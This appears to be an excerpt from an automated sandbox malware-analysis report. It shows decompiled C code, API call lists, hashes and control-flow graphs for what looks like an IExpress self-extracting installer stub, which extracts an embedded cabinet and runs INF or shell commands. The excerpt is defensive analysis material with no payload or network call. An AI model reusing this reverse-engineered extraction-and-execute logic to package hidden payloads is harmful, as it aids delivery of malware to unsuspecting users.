                                                                        0x00a31b8c
                                                                        0x00a31b8c
                                                                        0x00a31b98
                                                                        0x00a31bc7
                                                                        0x00a31bc9
                                                                        0x00a31bcc
                                                                        0x00a31bd3
                                                                        0x00a31d75
                                                                        0x00a31d76
                                                                        0x00a31d78
                                                                        0x00a31d7f
                                                                        0x00a31e05
                                                                        0x00a31e09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a31e12
                                                                        0x00a31e1b
                                                                        0x00a31e73
                                                                        0x00a31e21
                                                                        0x00a31e21
                                                                        0x00a31e28
                                                                        0x00a31e37
                                                                        0x00a31e3e
                                                                        0x00a31e52
                                                                        0x00a31e60
                                                                        0x00a31e60
                                                                        0x00a31e3e
                                                                        0x00a31e79
                                                                        0x00a31e7b
                                                                        0x00a31e84
                                                                        0x00000000
                                                                        0x00a31d9b
                                                                        0x00a31d9b
                                                                        0x00a31da0
                                                                        0x00a31da2
                                                                        0x00a31da5
                                                                        0x00a31da5
                                                                        0x00a31da7
                                                                        0x00a31da8
                                                                        0x00a31dac
                                                                        0x00a31dae
                                                                        0x00a31db4
                                                                        0x00a31db7
                                                                        0x00a31db7
                                                                        0x00a31db9
                                                                        0x00a31dba
                                                                        0x00a31dbe
                                                                        0x00a31dc3
                                                                        0x00a31dce
                                                                        0x00a31dd2
                                                                        0x00a31deb
                                                                        0x00000000
                                                                        0x00a31df0
                                                                        0x00000000
                                                                        0x00a31dd2
                                                                        0x00a31bf7
                                                                        0x00a31bfe
                                                                        0x00a31c07
                                                                        0x00a31d55
                                                                        0x00a31d5a
                                                                        0x00a31d5b
                                                                        0x00a31d5d
                                                                        0x00a31d5e
                                                                        0x00000000
                                                                        0x00a31c1b
                                                                        0x00a31c1b
                                                                        0x00a31c20
                                                                        0x00a31c2c
                                                                        0x00a31c33
                                                                        0x00a31c38
                                                                        0x00a31c3a
                                                                        0x00a31c3a
                                                                        0x00a31c40
                                                                        0x00a31c4b
                                                                        0x00a31c4b
                                                                        0x00a31c5d
                                                                        0x00a31c61
                                                                        0x00a31dd4
                                                                        0x00a31dd4
                                                                        0x00a31dd6
                                                                        0x00a31ddb
                                                                        0x00a31ddc
                                                                        0x00a31dde
                                                                        0x00a31d64
                                                                        0x00a31d64
                                                                        0x00a31d67
                                                                        0x00a31d6c
                                                                        0x00000000
                                                                        0x00a31c67
                                                                        0x00a31c67
                                                                        0x00a31c6d
                                                                        0x00a31c72
                                                                        0x00a31c74
                                                                        0x00a31c74
                                                                        0x00a31c8e
                                                                        0x00a31c99
                                                                        0x00a31cc0
                                                                        0x00a31cf8
                                                                        0x00a31d07
                                                                        0x00a31d23
                                                                        0x00a31d09
                                                                        0x00a31d14
                                                                        0x00a31d1b
                                                                        0x00a31d1b
                                                                        0x00a31d2b
                                                                        0x00a31d2d
                                                                        0x00a31d2d
                                                                        0x00a31d38
                                                                        0x00a31d39
                                                                        0x00a31d46
                                                                        0x00a31cc2
                                                                        0x00a31cc2
                                                                        0x00a31ccc
                                                                        0x00a31cce
                                                                        0x00a31cce
                                                                        0x00a31cdb
                                                                        0x00a31ce6
                                                                        0x00a31cee
                                                                        0x00a31cee
                                                                        0x00a31e89
                                                                        0x00a31e91
                                                                        0x00a31e92
                                                                        0x00a31e94
                                                                        0x00a31e97
                                                                        0x00a31ea4
                                                                        0x00a31ea4
                                                                        0x00a31c61
                                                                        0x00a31c07
                                                                        0x00a31bd3
                                                                        0x00a31b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00A31C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A31140,00000000,00000008,?), ref: 00A31CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00A31D1B
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-1533028066
                                                                        • Opcode ID: 74b123c53d7a68f3ea2ea1d8c4d01c2e1f5bee783d4d0db6057b9c51816e52c9
                                                                        • Instruction ID: 4adf835f85f721e7c3c08a9aa6fc85c30c60ad213ded753e0ea0836d42b2daf4
                                                                        • Opcode Fuzzy Hash: 74b123c53d7a68f3ea2ea1d8c4d01c2e1f5bee783d4d0db6057b9c51816e52c9
                                                                        • Instruction Fuzzy Hash: B5A149B0A003186BEB20DF24CC45FFA77A9EB56350F1447A9F595A32D1DBB09E86CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 a3597d-a359b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a359bb-a359d8 call a344b9 call a36285 324->325 326 a359dd-a35a1b GetDiskFreeSpaceA 324->326 343 a35c05-a35c14 call a36ce0 325->343 328 a35ba1-a35bde memset call a36285 GetLastError FormatMessageA 326->328 329 a35a21-a35a4a MulDiv 326->329 339 a35be3-a35bfc call a344b9 SetCurrentDirectoryA 328->339 329->328 332 a35a50-a35a6c GetVolumeInformationA 329->332 335 a35ab5-a35aca SetCurrentDirectoryA 332->335 336 a35a6e-a35ab0 memset call a36285 GetLastError FormatMessageA 332->336 337 a35acc-a35ad1 335->337 336->339 341 a35ad3-a35ad8 337->341 342 a35ae2-a35ae4 337->342 351 a35c02 339->351 341->342 346 a35ada-a35ae0 341->346 348 a35ae7-a35af8 342->348 349 a35ae6 342->349 346->337 346->342 353 a35af9-a35afb 348->353 349->348 354 a35c04 351->354 355 a35b05-a35b08 353->355 356 a35afd-a35b03 353->356 354->343 357 a35b20-a35b27 355->357 358 a35b0a-a35b1b call a344b9 355->358 356->353 356->355 360 a35b52-a35b5b 357->360 361 a35b29-a35b33 357->361 358->351 362 a35b62-a35b6d 360->362 361->360 364 a35b35-a35b50 361->364 365 a35b76-a35b7d 362->365 366 a35b6f-a35b74 362->366 364->362 368 a35b83 365->368 369 a35b7f-a35b81 365->369 367 a35b85 366->367 370 a35b87-a35b94 call a3268b 367->370 371 a35b96-a35b9f 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E00A3597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xa39124 = E00A36285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00A344B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xa39a34 & 0x00000008;
                                                                        							if(( *0xa39a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xa39a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xa39124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00A3268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xa39a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xa39a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00A344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00A344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00A36CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}



































                                                                        0x00a3597d
                                                                        0x00a35988
                                                                        0x00a3598f
                                                                        0x00a3599a
                                                                        0x00a359a6
                                                                        0x00a359a8
                                                                        0x00a359af
                                                                        0x00a359b9
                                                                        0x00a359dd
                                                                        0x00a359e4
                                                                        0x00a359f1
                                                                        0x00a359fe
                                                                        0x00a35a0b
                                                                        0x00a35a13
                                                                        0x00a35a19
                                                                        0x00a35a1b
                                                                        0x00a35ba1
                                                                        0x00a35baf
                                                                        0x00a35bbd
                                                                        0x00a35bd8
                                                                        0x00a35bde
                                                                        0x00a35be3
                                                                        0x00a35bec
                                                                        0x00a35bf0
                                                                        0x00a35bfc
                                                                        0x00a35c02
                                                                        0x00a35c02
                                                                        0x00a35c02
                                                                        0x00a35c04
                                                                        0x00a35c04
                                                                        0x00000000
                                                                        0x00a35c04
                                                                        0x00a35a27
                                                                        0x00a35a3a
                                                                        0x00a35a46
                                                                        0x00a35a48
                                                                        0x00a35a4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35a64
                                                                        0x00a35a6a
                                                                        0x00a35a6c
                                                                        0x00a35abc
                                                                        0x00a35ac2
                                                                        0x00a35ac9
                                                                        0x00a35aca
                                                                        0x00a35aca
                                                                        0x00a35acc
                                                                        0x00a35acc
                                                                        0x00a35acf
                                                                        0x00a35ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35ad3
                                                                        0x00a35ad6
                                                                        0x00a35ad8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35ada
                                                                        0x00a35adc
                                                                        0x00a35add
                                                                        0x00a35add
                                                                        0x00a35ae0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35ae0
                                                                        0x00a35ae2
                                                                        0x00a35ae4
                                                                        0x00a35ae6
                                                                        0x00a35ae6
                                                                        0x00a35ae6
                                                                        0x00a35ae9
                                                                        0x00a35aeb
                                                                        0x00a35af0
                                                                        0x00a35af6
                                                                        0x00a35af8
                                                                        0x00a35af9
                                                                        0x00a35af9
                                                                        0x00a35afb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35afd
                                                                        0x00a35aff
                                                                        0x00a35b00
                                                                        0x00a35b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35b03
                                                                        0x00a35b05
                                                                        0x00a35b08
                                                                        0x00a35b20
                                                                        0x00a35b27
                                                                        0x00a35b52
                                                                        0x00a35b52
                                                                        0x00a35b5b
                                                                        0x00a35b62
                                                                        0x00a35b6b
                                                                        0x00a35b6d
                                                                        0x00a35b76
                                                                        0x00a35b7d
                                                                        0x00a35b83
                                                                        0x00a35b7f
                                                                        0x00a35b7f
                                                                        0x00a35b7f
                                                                        0x00a35b6f
                                                                        0x00a35b72
                                                                        0x00a35b72
                                                                        0x00a35b85
                                                                        0x00a35b98
                                                                        0x00a35b9e
                                                                        0x00a35b87
                                                                        0x00a35b8f
                                                                        0x00a35b8f
                                                                        0x00000000
                                                                        0x00a35b85
                                                                        0x00a35b29
                                                                        0x00a35b33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35b35
                                                                        0x00a35b48
                                                                        0x00a35b4a
                                                                        0x00000000
                                                                        0x00a35b4a
                                                                        0x00a35b0f
                                                                        0x00a35b16
                                                                        0x00000000
                                                                        0x00a35b16
                                                                        0x00a35a7c
                                                                        0x00a35a8a
                                                                        0x00a35aa5
                                                                        0x00a35aab
                                                                        0x00000000
                                                                        0x00a359bb
                                                                        0x00a359c0
                                                                        0x00a359c7
                                                                        0x00a359d1
                                                                        0x00a359d6
                                                                        0x00a35c05
                                                                        0x00a35c14
                                                                        0x00a35c14

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A359A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A359AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A35A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00A35A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A35A64
                                                                        • memset.MSVCRT ref: 00A35A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A35A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A35AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A35BFC
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: e51c6d28d362630edb857e69cf0314ec365d0e55d00a69e379cba9e7eeb2eb9c
                                                                        • Instruction ID: fd2ef43df36dcd6febbcaac6fb2f0313d03c451086ffa1108aff35e978cb0695
                                                                        • Opcode Fuzzy Hash: e51c6d28d362630edb857e69cf0314ec365d0e55d00a69e379cba9e7eeb2eb9c
                                                                        • Instruction Fuzzy Hash: A17192B1D0061CAFEB25DFA4DD89BFBB7BCEB48344F0441AAF44596140EA749E858B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 a34fe0-a3501a call a3468f FindResourceA LoadResource LockResource 377 a35161-a35163 374->377 378 a35020-a35027 374->378 379 a35057-a3505e call a34efd 378->379 380 a35029-a35051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 a35060-a35077 call a344b9 379->383 384 a3507c-a350b4 379->384 380->379 388 a35107-a3510e 383->388 389 a350b6-a350da 384->389 390 a350e8-a35104 call a344b9 384->390 392 a35110-a35117 FreeResource 388->392 393 a3511d-a3511f 388->393 398 a35106 389->398 402 a350dc 389->402 390->398 392->393 395 a35121-a35127 393->395 396 a3513a-a35141 393->396 395->396 399 a35129-a35135 call a344b9 395->399 400 a35143-a3514a 396->400 401 a3515f 396->401 398->388 399->396 400->401 404 a3514c-a35159 SendMessageA 400->404 401->377 405 a350e3-a350e6 402->405 404->401 405->390 405->398
                                                                        C-Code - Quality: 77%
                                                                        			E00A34FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xa39144 = E00A3468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xa39140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xa38584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xa38584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E00A34EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00A34CA0, E00A34CC0, E00A34980, E00A34A50, E00A34AD0, E00A34B60, E00A34BC0, 1, 0xa39148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xa39148; // 0x0
                                                                        						_t24 =  *0xa38584; // 0x0
                                                                        						E00A344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xa31140, 0, E00A34CD0, 0, 0xa39140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xa38584; // 0x0
                                                                        					E00A344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xa39140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xa39140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xa391d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00A344B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xa38a38 & 0x00000001) == 0 && ( *0xa39a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xa38584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}
















                                                                        0x00a34fe0
                                                                        0x00a34fe6
                                                                        0x00a34ff9
                                                                        0x00a3500d
                                                                        0x00a35013
                                                                        0x00a3501a
                                                                        0x00a35163
                                                                        0x00a35163
                                                                        0x00a35020
                                                                        0x00a35027
                                                                        0x00a35037
                                                                        0x00a35051
                                                                        0x00a35051
                                                                        0x00a35057
                                                                        0x00a3505e
                                                                        0x00a350a7
                                                                        0x00a350ad
                                                                        0x00a350b4
                                                                        0x00a350e8
                                                                        0x00a350e8
                                                                        0x00a350ee
                                                                        0x00a350ff
                                                                        0x00a35104
                                                                        0x00a35106
                                                                        0x00000000
                                                                        0x00a35106
                                                                        0x00a350cd
                                                                        0x00a350d3
                                                                        0x00a350da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a350dd
                                                                        0x00a350e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a35060
                                                                        0x00a35060
                                                                        0x00a35070
                                                                        0x00a35075
                                                                        0x00a35107
                                                                        0x00a35107
                                                                        0x00a3510e
                                                                        0x00a35111
                                                                        0x00a35117
                                                                        0x00a35117
                                                                        0x00a3511f
                                                                        0x00a35121
                                                                        0x00a35127
                                                                        0x00a35135
                                                                        0x00a35135
                                                                        0x00a35127
                                                                        0x00a35141
                                                                        0x00a35159
                                                                        0x00a35159
                                                                        0x00000000
                                                                        0x00a3515f

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A34FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00A35006
                                                                        • LockResource.KERNEL32(00000000), ref: 00A3500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00A35030
                                                                        • ShowWindow.USER32(00000000), ref: 00A35037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00A3504A
                                                                        • ShowWindow.USER32(00000000), ref: 00A35051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A35111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A35159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: e097d049c77e900a6f3c8cb46cd38767c6e4d76d51adf2db474b99df262d3ce1
                                                                        • Instruction ID: d56ad97fbea3f7a8bd163ed55706193ac0452353ac7f5ce463004c3965bf3c97
                                                                        • Opcode Fuzzy Hash: e097d049c77e900a6f3c8cb46cd38767c6e4d76d51adf2db474b99df262d3ce1
                                                                        • Instruction Fuzzy Hash: A1313AB0B407117FE720EBF5AD8AF6776ACB718785F040624F941A21A1DBF9DC028A60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
